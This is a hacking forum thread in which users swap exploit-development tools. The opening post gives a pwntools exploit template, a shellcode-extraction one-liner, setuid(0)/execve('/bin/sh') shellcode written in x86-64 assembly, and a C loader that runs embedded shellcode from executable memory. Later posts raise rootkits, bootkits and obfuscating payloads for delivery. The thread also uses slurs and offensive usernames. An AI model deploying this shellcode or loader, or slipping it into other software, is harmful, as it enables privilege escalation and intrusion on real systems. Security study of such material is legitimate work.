User Controls

Low level development and security thread.

  1. #1
    Sophie Pedophile Tech Support
    Sup niggas, i was wondering if those of you who are so inclined would be willing to share any of the utilities, resources and/or tools you like to use when working with/on automating certain aspects of low level security. Yes i already have a debugger, multiple in fact(Including Radare2, looking at you Bueno). I also have an assembler, linker, compiler and a tool for static code analysis. But that's not really the type of tool i'm looking for or talking about.

    I'm not sure if you're familiar but there's a Python tool/library that's useful in terms of exploit and payload development called pwntools. If you're interested just install it with `pip3 install pwntools`. Besides providing tools that'll let you patch ELF files from the CLI and having a built in disassembler among other things, when imported as a lib it allows you to do cool stuff like:


    from pwn import *

    # Set up pwntools for the correct architecture
    context.update(arch='i386')
    exe = './path/to/binary'

    # Many built-in settings can be controlled on the command-line and show up
    # in "args". For example, to dump all data sent/received, and disable ASLR
    # for all created processes...
    # ./exploit.py DEBUG NOASLR


    def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
    return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    else:
    return process([exe] + argv, *a, **kw)

    # Specify your GDB script here for debugging
    # GDB will be launched if the exploit is run via e.g.
    # ./exploit.py GDB
    gdbscript = '''
    continue
    '''.format(**locals())
    # Exploit goes here

    io = start()

    # shellcode = asm(shellcraft.sh())
    # payload = fit({
    # 32: 0xdeadbeef,
    # 'iaaa': [1, 2, 'Hello', 3]
    # }, length=128)
    # io.send(payload)
    # flag = io.recv(...)
    # log.success(flag)

    io.interactive()


    This is the kind of tool i'm talking about. And since i don't just want to come here hat in hand i will share some of the stuff i like to use as well. Like ROPGadget.py which lets you search for gadgets in a binary. It supports several file formats and architectures and is pretty useful for ROPChaining.


    git clone https://github.com/JonathanSalwan/ROPgadget.git


    I also recently came across a tool called Shellnoob, which despite it's name is pretty 1337. Besides that though it's mostly very convenient because among other things it can convert between the following file types:


    Supported input: asm, obj, bin, hex, c, shellstorm
    Supported output: asm, obj, exe, bin, hex, c, completec, python, bash, ruby, pretty, safeasm


    It can also NOP out fork() calls and patch executables has interactive ASM to opcode mode, resolves syscall numbers and supports both ATT and Intel syntax. Not to mention it was accepted for Blackhat Arsenal, which gives it some serious street cred if you ask me.


    git clone https://github.com/reyammer/shellnoob.git


    Personally i like to keep a little cheatsheet handy in order to remember some useful Linux utilities related to what we are talking about.


    # Dump hex first 128 bytes
    xxd -l 128 <filename>

    # Dump binary first 128 bytes
    xxd -b -l 128 <filename>

    # Dump c-style header first 128 bytes at a 256-bytes offset
    xxd -i -s 256 -l 128 <filename>

    # Check relocations inside the object file
    readelf --relocs <filename>.o

    # Dump all headers
    readelf --headers <filename>

    # Dump everything
    readelf --all <filename>

    # List symbols from object file
    nm <filename>

    # List and demangle dynamic symbols from stripped object file
    nm -D --demangle <filename>

    # Get preprocessing output
    gcc -E -P <source_file>.c > <preprocessing_output>.i

    # Add current path to the linker environment
    linker=$(export LD_LIBRARY_PATH=`pwd`)

    # Trace SysCalls
    strace <filename> `ltrace -i -C <filename>`

    # Simple disassembly of an object file
    objdump -M intel -d <filename>.o

    # Extract shellcode from .sc or .o/.obj file
    objdump -d $filename | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: |cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'


    If you got anything to add to the cheatsheet, please do. That last one is particularly useful. If you take the below Assembly(ATT).


    global _start

    section .text

    _start:
    ; setuid(0)
    xor edi,edi
    push rdi ; null terminator for the following string
    push 105
    pop rax
    ; push /bin//sh in reverse
    mov rbx,0xd0e65e5edcd2c45e
    syscall

    ; execve
    ror rbx,1
    mov al,59
    push rbx
    xchg esi,edi
    push rsp
    cdq
    ; store /bin//sh address in RDI, points at string
    pop rdi
    ; Call the Execve syscall
    syscall


    Compile it with NASM like so:

    nasm -felf64 XorSh.nasm -o XorSh.o && ld XorSh.o -o XorSh


    You can now either run the compiled ELF binary `./XorSh` or extract shellcode from the object file and use it to inject it with Python, or use it as payload in a C program. If you extract the shellcode you can use the below C program to test it.


    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/mman.h>

    /* should be enough to hold your shellcode, if not just set this to a higher value */
    #define BUFSIZE 4096
    /* set to 1 to enable debugging, will break before executing the shellcode */
    #define DEBUGGING 0

    /* either paste your shellcode in here ... */
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

    int main(int argc, char* argv[])
    {
    size_t len;
    char *buf, *ptr;

    printf("[*] Allocating executable memory...\n");
    buf = mmap(NULL, BUFSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    ptr = buf;
    printf("[+] Buffer @ %p\n", buf);

    #if DEBUGGING
    ptr[0] = '\xcc';
    ptr++;
    #endif

    /* ... or pass it as filename to the program */
    if (argc > 1) {
    printf("[*] Reading shellcode from file...\n");
    FILE *f = fopen(argv[1], "r");
    if (!f) {
    fprintf(stderr, "[-] Cannot open %s: %s\n", argv[1], strerror(errno));
    exit(-1);
    }
    len = fread(ptr, 1, BUFSIZE, f);

    fclose(f);
    } else {
    len = sizeof(shellcode);
    printf("[*] Copying shellcode...\n");
    memcpy(ptr, shellcode, len);
    }
    printf("[+] Done, size of shellcode: %i bytes\n", len);

    printf("[*] Jumping into shellcode...\n\n");
    (*(void (*)()) buf)();

    return 0;
    }


    It would also be pretty easy to adjust the above program to just run the shellcode, but you might as well just run the ELF binary i guess. Anyway, if you have anything to add provided it's along the lines of what i posted please do so.

    If you have something really special, like a tool you coded yourself that's particularly useful with regards to this stuff. I may trade you something special in return. I have a closed source Windows tool, complete with GUI that automates finding ROPGadgets and making ROPChains, it's not for sale anywhere, and only a few people have this tool. It's excellent for exploit development targeting Windows. I will send you the source files for this tool if you have something special to trade for it.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. #2
    SBTlauien African Astronaut
    If I had more time on my hands, this is the direction I'd be going in. I did get a light to blink and had some buttons that made it blink...
  3. #3
    mashlehash victim of incest [my perspicuously dependant flavourlessness]
    yo
  4. #4
    Sophie Pedophile Tech Support
    Originally posted by mashlehash yo

    Yo, Mash, like what you're seeing in this thread? How's learning Python going for you?

    Originally posted by SBTlauien If I had more time on my hands, this is the direction I'd be going in. I did get a light to blink and had some buttons that made it blink…

    I would definitely recommend getting into exploit development and general low level security research, like stuff focused on firmware and the kernel. It will be very useful for MalDev as well. Think rootkits and bootkits.

    If anyone is interested i will make a post ITT thread about some techniques you can employ for exploits and shellcode that argets Windows. More specifically, generating shellcode for an exploit or shell and obfuscating by converting to ANCII and delivering/deploying your payload in that manner. I wrote some Bash to convert shellcode to ANCII and inject it into a template ready for compilation.

    It's pretty neat.

    Honestly i wish more people would be interested in low level security, i am part of multiple security oriented communities, but even among skilled security practitioners there don't seem to be that many people really into this kind of stuff. And if they are they're either highly skilled cybermancers that have better things to do than discuss this sort of stuff, or they're not particularly proficient. Not judging either, this is some pretty abstract stuff and i am very much still learning myself. Ah well, no excuse to be bored, personally. I try my best to put in the work to achieve my long term goals.
  5. #5
    SBTlauien African Astronaut
    Originally posted by Sophie Yo, Mash, like what you're seeing in this thread? How's learning Python going for you?



    I would definitely recommend getting into exploit development and general low level security research, like stuff focused on firmware and the kernel. It will be very useful for MalDev as well. Think rootkits and bootkits.

    If anyone is interested i will make a post ITT thread about some techniques you can employ for exploits and shellcode that argets Windows. More specifically, generating shellcode for an exploit or shell and obfuscating by converting to ANCII and delivering/deploying your payload in that manner. I wrote some Bash to convert shellcode to ANCII and inject it into a template ready for compilation.

    It's pretty neat.

    Honestly i wish more people would be interested in low level security, i am part of multiple security oriented communities, but even among skilled security practitioners there don't seem to be that many people really into this kind of stuff. And if they are they're either highly skilled cybermancers that have better things to do than discuss this sort of stuff, or they're not particularly proficient. Not judging either, this is some pretty abstract stuff and i am very much still learning myself. Ah well, no excuse to be bored, personally. I try my best to put in the work to achieve my long term goals.

    I'm more interested in Linux/Android exploits. Windows isn't really my thing, even when attacking. I know it's more profitable for both black and white hat, but I just don't want to have to learn about a OS that I don't use.
  6. #6
    Sophie Pedophile Tech Support
    Originally posted by SBTlauien I'm more interested in Linux/Android exploits. Windows isn't really my thing, even when attacking. I know it's more profitable for both black and white hat, but I just don't want to have to learn about a OS that I don't use.

    That's fair enough. The OP is Linux focused. I've set some time aside tomorrow to work on a Linux project related to the subject this thread is about. If i come across anything interesting, i might just post about that as well.
Jump to Top